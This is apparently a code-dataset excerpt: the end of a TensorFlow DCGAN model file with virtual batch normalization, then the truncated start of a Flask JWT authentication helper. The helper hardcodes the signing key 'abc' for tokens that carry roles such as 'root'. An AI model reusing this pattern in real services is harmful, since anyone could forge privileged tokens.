name='real_images_and_labels')\n if gpu_idx == 0:\n self.sample_images = tf.placeholder(tf.float32, [self.sample_size] + self.image_shape,\n name='sample_images')\n self.sample_labels = tf.placeholder(tf.int32, [self.sample_size], name=\"sample_labels\")\n\n self.reference_G, self.reference_zs = self.generator(is_ref=True)\n # Since I don't know how to turn variable reuse off, I can only activate it once.\n # So here I build a dummy copy of the discriminator before turning variable reuse on for the generator.\n dummy_joint = tf.concat(0, [images, self.reference_G])\n dummy = self.discriminator(dummy_joint, reuse=False, prefix=\"dummy\")\n\n G, zs = self.generator(is_ref=False)\n\n if gpu_idx == 0:\n G_means = tf.reduce_mean(G, 0, keep_dims=True)\n G_vars = tf.reduce_mean(tf.square(G - G_means), 0, keep_dims=True)\n G = tf.Print(G, [tf.reduce_mean(G_means), tf.reduce_mean(G_vars)], \"generator mean and average var\",\n first_n=1)\n image_means = tf.reduce_mean(images, 0, keep_dims=True)\n image_vars = tf.reduce_mean(tf.square(images - image_means), 0, keep_dims=True)\n images = tf.Print(images, [tf.reduce_mean(image_means), tf.reduce_mean(image_vars)],\n \"image mean and average var\", first_n=1)\n self.Gs = []\n self.zses = []\n self.Gs.append(G)\n self.zses.append(zs)\n\n joint = tf.concat(0, [images, G])\n class_logits, D_on_data, D_on_data_logits, D_on_G, D_on_G_logits = self.discriminator(joint, reuse=True,\n prefix=\"joint \")\n # D_on_G_logits = tf.Print(D_on_G_logits, [D_on_G_logits], \"D_on_G_logits\")\n\n self.d_sum = tf.histogram_summary(\"d\", D_on_data)\n self.d__sum = tf.histogram_summary(\"d_\", D_on_G)\n self.G_sum = tf.image_summary(\"G\", G)\n\n d_label_smooth = self.d_label_smooth\n d_loss_real = sigmoid_kl_with_logits(D_on_data_logits, 1. - d_label_smooth)\n class_loss_weight = 1.\n d_loss_class = class_loss_weight * tf.nn.sparse_softmax_cross_entropy_with_logits(class_logits,\n tf.to_int64(sparse_labels))\n error_rate = 1. - tf.reduce_mean(tf.to_float(tf.nn.in_top_k(class_logits, sparse_labels, 1)))\n # self.d_loss_class = tf.Print(self.d_loss_class, [error_rate], \"gpu \" + str(gpu_idx) + \" current minibatch error rate\")\n if gpu_idx == 0:\n update = tf.assign(num_error_rate, num_error_rate + 1.)\n with tf.control_dependencies([update]):\n # Start off as a true average for 1st 100 samples\n # Then switch to a running average to compensate for ongoing learning\n tc = tf.maximum(.01, 1. / num_error_rate)\n update = tf.assign(avg_error_rate, (1. - tc) * avg_error_rate + tc * error_rate)\n with tf.control_dependencies([update]):\n d_loss_class = tf.Print(d_loss_class,\n [avg_error_rate], \"running top-1 error rate\")\n # Do not smooth the negative targets.\n # If we use positive targets of alpha and negative targets of beta,\n # then the optimal discriminator function is\n # D(x) = (alpha p_data(x) + beta p_generator(x)) / (p_data(x) + p_generator(x)).\n # This means if we want to get less extreme values, we shrink alpha.\n # Increasing beta makes the generator self-reinforcing.\n # Note that using this one-sided label smoothing also shifts the equilibrium\n # value to alpha/2.\n d_loss_fake = tf.nn.sigmoid_cross_entropy_with_logits(D_on_G_logits,\n tf.zeros_like(D_on_G_logits))\n g_loss = sigmoid_kl_with_logits(D_on_G_logits, self.generator_target_prob)\n d_loss_class = tf.reduce_mean(d_loss_class)\n d_loss_real = tf.reduce_mean(d_loss_real)\n d_loss_fake = tf.reduce_mean(d_loss_fake)\n g_loss = tf.reduce_mean(g_loss)\n if gpu_idx == 0:\n self.g_losses = []\n self.g_losses.append(g_loss)\n\n d_loss = d_loss_real + d_loss_fake + d_loss_class\n if gpu_idx == 0:\n self.d_loss_reals = []\n self.d_loss_fakes = []\n self.d_loss_classes = []\n self.d_losses = []\n self.d_loss_reals.append(d_loss_real)\n self.d_loss_fakes.append(d_loss_fake)\n self.d_loss_classes.append(d_loss_class)\n self.d_losses.append(d_loss)\n\n # self.g_loss_sum = tf.scalar_summary(\"g_loss\", self.g_loss)\n # self.d_loss_sum = tf.scalar_summary(\"d_loss\", self.d_loss)\n\n if gpu_idx == 0:\n get_vars(self)\n\n def discriminator(self, image, reuse=False, y=None, prefix=\"\"):\n num_classes = 1001\n\n if reuse:\n tf.get_variable_scope().reuse_variables()\n\n batch_size = int(image.get_shape()[0])\n assert batch_size == 2 * self.batch_size\n\n \"\"\"\n # L1 distance to average value of corresponding pixel in positive and negative batch\n # Included as a feature to prevent early mode collapse\n b, r, c, ch = [int(e) for e in image.get_shape()]\n pos = tf.slice(image, [0, 0, 0, 0], [self.batch_size, r, c, ch])\n neg = tf.slice(image, [self.batch_size, 0, 0, 0], [self.batch_size, r, c, ch])\n pos = tf.reshape(pos, [self.batch_size, -1])\n neg = tf.reshape(neg, [self.batch_size, -1])\n mean_pos = tf.reduce_mean(pos, 0, keep_dims=True)\n mean_neg = tf.reduce_mean(neg, 0, keep_dims=True)\n\n # difference from mean, with each example excluding itself from the mean\n pos_diff_pos = (1. + 1. / (self.batch_size - 1.)) * pos - mean_pos\n pos_diff_neg = pos - mean_neg\n neg_diff_pos = neg - mean_pos\n neg_diff_neg = (1. + 1. / (self.batch_size - 1.)) * neg - mean_neg\n\n diff_feat = tf.concat(0, [tf.concat(1, [pos_diff_pos, pos_diff_neg]),\n tf.concat(1, [neg_diff_pos, neg_diff_neg])])\n\n with tf.variable_scope(\"d_diff_feat\"):\n scale = tf.get_variable(\"d_untied_scale\", [128 * 128 * 3 * 2], tf.float32,\n tf.random_normal_initializer(mean=1., stddev=0.1))\n\n diff_feat = diff_feat = tf.exp(- tf.abs(scale) * tf.abs(diff_feat))\n diff_feat = self.bnx(diff_feat, name=\"d_bnx_diff_feat\")\n \"\"\"\n\n noisy_image = image + tf.random_normal([batch_size, 128, 128, 3],\n mean=0.0,\n stddev=.1)\n\n print(\"Discriminator shapes\")\n print(\"image: \", image.get_shape())\n\n def tower(bn, suffix):\n assert not self.y_dim\n print(\"\\ttower \" + suffix)\n h0 = lrelu(bn(conv2d(noisy_image, self.df_dim, name='d_h0_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_0\" + suffix))\n print(\"\\th0 \", h0.get_shape())\n h1 = lrelu(bn(conv2d(h0, self.df_dim * 2, name='d_h1_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_1\" + suffix))\n print(\"\\th1 \", h1.get_shape())\n h2 = lrelu(bn(conv2d(h1, self.df_dim * 4, name='d_h2_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_2\" + suffix))\n print(\"\\th2 \", h2.get_shape())\n\n h3 = lrelu(bn(conv2d(h2, self.df_dim * 4, name='d_h3_conv' + suffix, d_h=1, d_w=1,\n k_w=3, k_h=3), \"d_bn_3\" + suffix))\n print(\"\\th3 \", h3.get_shape())\n h4 = lrelu(bn(conv2d(h3, self.df_dim * 4, name='d_h4_conv' + suffix, d_h=1, d_w=1,\n k_w=3, k_h=3), \"d_bn_4\" + suffix))\n print(\"\\th4 \", h4.get_shape())\n h5 = lrelu(bn(conv2d(h4, self.df_dim * 8, name='d_h5_conv' + suffix, d_h=2, d_w=2,\n k_w=3, k_h=3), \"d_bn_5\" + suffix))\n print(\"\\th5 \", h5.get_shape())\n\n h6 = lrelu(bn(conv2d(h5, self.df_dim * 8, name='d_h6_conv' + suffix,\n k_w=3, k_h=3), \"d_bn_6\" + suffix))\n print(\"\\th6 \", h6.get_shape())\n # return tf.reduce_mean(h6, [1, 2])\n h6_reshaped = tf.reshape(h6, [batch_size, -1])\n print('\\th6_reshaped: ', h6_reshaped.get_shape())\n\n h7 = lrelu(bn(linear(h6_reshaped, self.df_dim * 40, scope=\"d_h7\" + suffix), \"d_bn_7\" + suffix))\n\n return h7\n\n h = tower(self.bnx, \"\")\n print(\"h: \", h.get_shape())\n\n n_kernels = 300\n dim_per_kernel = 50\n x = linear(h, n_kernels * dim_per_kernel, scope=\"d_h\")\n activation = tf.reshape(x, (batch_size, n_kernels, dim_per_kernel))\n\n big = np.zeros((batch_size, batch_size), dtype='float32')\n big += np.eye(batch_size)\n big = tf.expand_dims(big, 1)\n\n abs_dif = tf.reduce_sum(\n tf.abs(tf.expand_dims(activation, 3) - tf.expand_dims(tf.transpose(activation, [1, 2, 0]), 0)), 2)\n mask = 1. - big\n masked = tf.exp(-abs_dif) * mask\n\n def half(tens, second):\n m, n, _ = tens.get_shape()\n m = int(m)\n n = int(n)\n return tf.slice(tens, [0, 0, second * self.batch_size], [m, n, self.batch_size])\n\n # TODO: speedup by allocating the denominator directly instead of constructing it by sum\n # (current version makes it easier to play with the mask and not need to rederive\n # the denominator)\n f1 = tf.reduce_sum(half(masked, 0), 2) / tf.reduce_sum(half(mask, 0))\n f2 = tf.reduce_sum(half(masked, 1), 2) / tf.reduce_sum(half(mask, 1))\n\n minibatch_features = [f1, f2]\n\n x = tf.concat(1, [h] + minibatch_features)\n print(\"x: \", x.get_shape())\n # x = tf.nn.dropout(x, .5)\n\n class_logits = linear(x, num_classes, 'd_indiv_logits')\n\n image_means = tf.reduce_mean(image, 0, keep_dims=True)\n mean_sub_image = image - image_means\n image_vars = tf.reduce_mean(tf.square(mean_sub_image), 0)\n\n generated_class_logits = tf.squeeze(tf.slice(class_logits, [0, num_classes - 1], [batch_size, 1]))\n positive_class_logits = tf.slice(class_logits, [0, 0], [batch_size, num_classes - 1])\n\n \"\"\"\n # make these a separate matmul with weights initialized to 0, attached only to generated_class_logits, or things explode\n generated_class_logits = tf.squeeze(generated_class_logits) + tf.squeeze(linear(diff_feat, 1, stddev=0., scope=\"d_indivi_logits_from_diff_feat\"))\n assert len(generated_class_logits.get_shape()) == 1\n # re-assemble the logits after incrementing the generated class logits\n class_logits = tf.concat(1, [positive_class_logits, tf.expand_dims(generated_class_logits, 1)])\n \"\"\"\n\n mx = tf.reduce_max(positive_class_logits, 1, keep_dims=True)\n safe_pos_class_logits = positive_class_logits - mx\n\n gan_logits = tf.log(tf.reduce_sum(tf.exp(safe_pos_class_logits), 1)) + tf.squeeze(mx) - generated_class_logits\n assert len(gan_logits.get_shape()) == 1\n\n probs = tf.nn.sigmoid(gan_logits)\n\n return [tf.slice(class_logits, [0, 0], [self.batch_size, num_classes]),\n tf.slice(probs, [0], [self.batch_size]),\n tf.slice(gan_logits, [0], [self.batch_size]),\n tf.slice(probs, [self.batch_size], [self.batch_size]),\n tf.slice(gan_logits, [self.batch_size], [self.batch_size])]\n\n def train(self, config):\n \"\"\"Train DCGAN\"\"\"\n\n d_optim = self.d_optim\n g_optim = self.g_optim\n\n tf.initialize_all_variables().run()\n\n # self.g_sum = tf.merge_summary([#self.z_sum,\n # self.d__sum,\n # self.G_sum, self.d_loss_fake_sum, self.g_loss_sum])\n # self.d_sum = tf.merge_summary([#self.z_sum,\n # self.d_sum, self.d_loss_real_sum, self.d_loss_sum])\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n # Hang onto a copy of z so we can feed the same one every time we store\n # samples to disk for visualization\n assert self.sample_size > self.batch_size\n assert self.sample_size % self.batch_size == 0\n sample_z = []\n steps = self.sample_size // self.batch_size\n assert steps > 0\n sample_zs = []\n for i in range(steps):\n cur_zs = self.sess.run(self.zses[0])\n assert all(z.shape[0] == self.batch_size for z in cur_zs)\n sample_zs.append(cur_zs)\n sample_zs = [np.concatenate([batch[i] for batch in sample_zs], axis=0) for i in range(len(sample_zs[0]))]\n assert all(sample_z.shape[0] == self.sample_size for sample_z in sample_zs)\n\n counter = 1\n\n if self.load(self.checkpoint_dir):\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] Load failed...\")\n\n start_time = time.time()\n print_time = time.time()\n sample_time = time.time()\n save_time = time.time()\n idx = 0\n try:\n while not coord.should_stop():\n idx += 1\n batch_start_time = time.time()\n\n (\n _d_optim, _d_sum, _g_optim,\n errD_fake, errD_real, errD_class, errG\n ) = self.sess.run([d_optim, self.d_sum,\n g_optim, # self.g_sum,\n self.d_loss_fakes[0],\n self.d_loss_reals[0],\n self.d_loss_classes[0],\n self.g_losses[0]])\n\n counter += 1\n if time.time() - print_time > 15.:\n print_time = time.time()\n total_time = print_time - start_time\n d_loss = errD_fake + errD_real + errD_class\n sec_per_batch = (print_time - start_time) / (idx + 1.)\n sec_this_batch = print_time - batch_start_time\n print(\n \"[Batch %(idx)d] time: %(total_time)4.4f, d_loss: %(d_loss).8f, g_loss: %(errG).8f, \"\n \"d_loss_real: %(errD_real).8f, d_loss_fake: %(errD_fake).8f, \"\n \"d_loss_class: %(errD_class).8f, sec/batch: %(sec_per_batch)4.4f, \"\n \"sec/this batch: %(sec_this_batch)4.4f\"\n % locals())\n\n if (idx < 300 and idx % 10 == 0) or time.time() - sample_time > 300:\n sample_time = time.time()\n samples = []\n # generator hard codes the batch size\n for i in range(self.sample_size // self.batch_size):\n feed_dict = {}\n for z, zv in zip(self.zses[0], sample_zs):\n if zv.ndim == 2:\n feed_dict[z] = zv[i * self.batch_size:(i + 1) * self.batch_size, :]\n elif zv.ndim == 4:\n feed_dict[z] = zv[i * self.batch_size:(i + 1) * self.batch_size, :, :, :]\n else:\n assert False\n cur_samples, = self.sess.run(\n [self.Gs[0]],\n feed_dict=feed_dict\n )\n samples.append(cur_samples)\n samples = np.concatenate(samples, axis=0)\n assert samples.shape[0] == self.sample_size\n save_images(samples, [8, 8],\n self.sample_dir + '/train_%s.png' % idx)\n\n if time.time() - save_time > 3600:\n save_time = time.time()\n self.save(config.checkpoint_dir, counter)\n except tf.errors.OutOfRangeError:\n print(\"Done training; epoch limit reached.\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n # sess.close()\n\n def bn(self, tensor, name, batch_size=None):\n # the batch size argument is actually unused\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, BatchNorm(batch_size, name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bn2(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_second_half(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bn1(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_first_half(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bnx(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_cross(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def vbn(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def __init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBN\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbnl(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def __init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBNL\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbnlp(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def __init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBNLP\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbn1(self, tensor, name):\n return self.vbn(tensor, name, half=1)\n\n def vbn2(self, tensor, name):\n return self.vbn(tensor, name, half=2)\n\n def save(self, checkpoint_dir, step):\n model_name = \"DCGAN.model\"\n model_dir = \"%s_%s\" % (self.dataset_name, self.batch_size)\n checkpoint_dir = os.path.join(checkpoint_dir, model_dir)\n\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n self.saver.save(self.sess,\n os.path.join(checkpoint_dir, model_name),\n global_step=step)\n\n def load(self, checkpoint_dir):\n print(\" [*] Reading checkpoints...\")\n\n model_dir = \"%s_%s\" % (self.dataset_name, self.batch_size)\n checkpoint_dir = os.path.join(checkpoint_dir, model_dir)\n\n ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_name = os.path.basename(ckpt.model_checkpoint_path)\n self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))\n return True\n else:\n print(\"Bad checkpoint: \", ckpt)\n return False\n\n\nclass BuildModel(object):\n \"\"\"\n A class that builds the generator forward prop when called.\n\n Parameters\n ----------\n dcgan: The DCGAN object to build within.\n func: The function to do it with.\n \"\"\"\n\n def __init__(self, dcgan):\n self.dcgan = dcgan\n self.func = build_model\n\n def __call__(self):\n return self.func(self.dcgan)\n\n\nclass GeneratorF(object):\n \"\"\"\n A class that builds the generator forward prop when called.\n\n Parameters\n ----------\n dcgan: The DCGAN object to build the generator within.\n func: The function to do it with.\n \"\"\"\n\n def __init__(self, dcgan, func):\n self.dcgan = dcgan\n self.func = func\n\n def __call__(self, z, y=None):\n return self.func(self.dcgan, z, y)\n\n\ndef get_vars(self):\n t_vars = tf.trainable_variables()\n self.d_vars = [var for var in t_vars if var.name.startswith('d_')]\n self.g_vars = [var for var in t_vars if var.name.startswith('g_')]\n for x in self.d_vars:\n assert x not in self.g_vars\n for x in self.g_vars:\n assert x not in self.d_vars\n for x in t_vars:\n assert x in self.g_vars or x in self.d_vars, x.name\n self.all_vars = t_vars\n\n\ndef read_and_decode(filename_queue):\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'image_raw': tf.FixedLenFeature([], tf.string),\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n image.set_shape(128 * 128 * 3)\n image = tf.reshape(image, [128, 128, 3])\n\n image = tf.cast(image, tf.float32) * (2. / 255) - 1.\n\n return image\n\n\ndef read_and_decode_with_labels(filename_queue):\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'image_raw': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64)\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n image.set_shape(128 * 128 * 3)\n image = tf.reshape(image, [128, 128, 3])\n\n image = tf.cast(image, tf.float32) * (2. / 255) - 1.\n\n label = tf.cast(features['label'], tf.int32)\n\n return image, label\n\n\ndef sigmoid_kl_with_logits(logits, targets):\n # broadcasts the same target value across the whole batch\n # this is implemented so awkwardly because tensorflow lacks an x log x op\n assert isinstance(targets, float)\n if targets in [0., 1.]:\n entropy = 0.\n else:\n entropy = - targets * np.log(targets) - (1. - targets) * np.log(1. - targets)\n return tf.nn.sigmoid_cross_entropy_with_logits(logits, tf.ones_like(logits) * targets) - entropy\n\n\nclass VBNL(object):\n \"\"\"\n Virtual Batch Normalization, Log scale for the scale parameter\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0, 1, 2], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0, 1, 2], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. - new_coeff\n new_mean = tf.reduce_mean(x, [1, 2], keep_dims=True)\n new_mean_sq = tf.reduce_mean(tf.square(x), [1, 2], keep_dims=True)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma_driver = tf.get_variable(\"gamma_driver\", [shape[-1]],\n initializer=tf.random_normal_initializer(0., 0.02))\n gamma = tf.exp(self.gamma_driver)\n gamma = tf.reshape(gamma, [1, 1, 1, -1])\n self.beta = tf.get_variable(\"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n beta = tf.reshape(self.beta, [1, 1, 1, -1])\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n\n\nclass VBNLP(object):\n \"\"\"\n Virtual Batch Normalization, Log scale for the scale parameter, per-Pixel normalization\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. - new_coeff\n new_mean = x\n new_mean_sq = tf.square(x)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma_driver = tf.get_variable(\"gamma_driver\", shape[1:],\n initializer=tf.random_normal_initializer(0., 0.02))\n gamma = tf.exp(self.gamma_driver)\n gamma = tf.expand_dims(gamma, 0)\n self.beta = tf.get_variable(\"beta\", shape[1:],\n initializer=tf.constant_initializer(0.))\n beta = tf.expand_dims(self.beta, 0)\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n\n\nclass VBN(object):\n \"\"\"\n Virtual Batch Normalization\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0, 1, 2], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0, 1, 2], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. - new_coeff\n new_mean = tf.reduce_mean(x, [1, 2], keep_dims=True)\n new_mean_sq = tf.reduce_mean(tf.square(x), [1, 2], keep_dims=True)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma = tf.get_variable(\"gamma\", [shape[-1]],\n initializer=tf.random_normal_initializer(1., 0.02))\n gamma = tf.reshape(self.gamma, [1, 1, 1, -1])\n self.beta = tf.get_variable(\"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n beta = tf.reshape(self.beta, [1, 1, 1, -1])\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n","sub_path":"imagenet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":41045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401278083","text":"from functools import wraps\nfrom flask import request, Response\nimport json\nfrom jwt import (\n JWT,\n jwk_from_dict,\n jwk_from_pem,\n)\n\ninstance = JWT()\nsigning_key = jwk_from_dict({\n 'k':'abc',\n 'kty': 'oct'\n })\n\ndef encode_auth_token(utenteloggato):\n try:\n if utenteloggato.ruolo == 'abcde':\n payload = {\n 'username': utenteloggato.username,\n 'ruolo': 'abcde'\n }\n elif utenteloggato.ruolo == 'root':\n payload = {\n 'username': utenteloggato.username,\n 'ruolo': 'root'\n }\n else:\n payload = {\n 'username': utenteloggato.username\n }\n return instance.encode(\n payload,\n signing_key,\n alg='HS256'\n )\n except Exception as e:\n return e\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth_token = False\n if not auth_token:\n auth_token = request.headers.get('capstoneAuth')\n if not auth_token:\n auth_token = request.headers.get('Authorization')\n if not auth_token:\n auth_token = 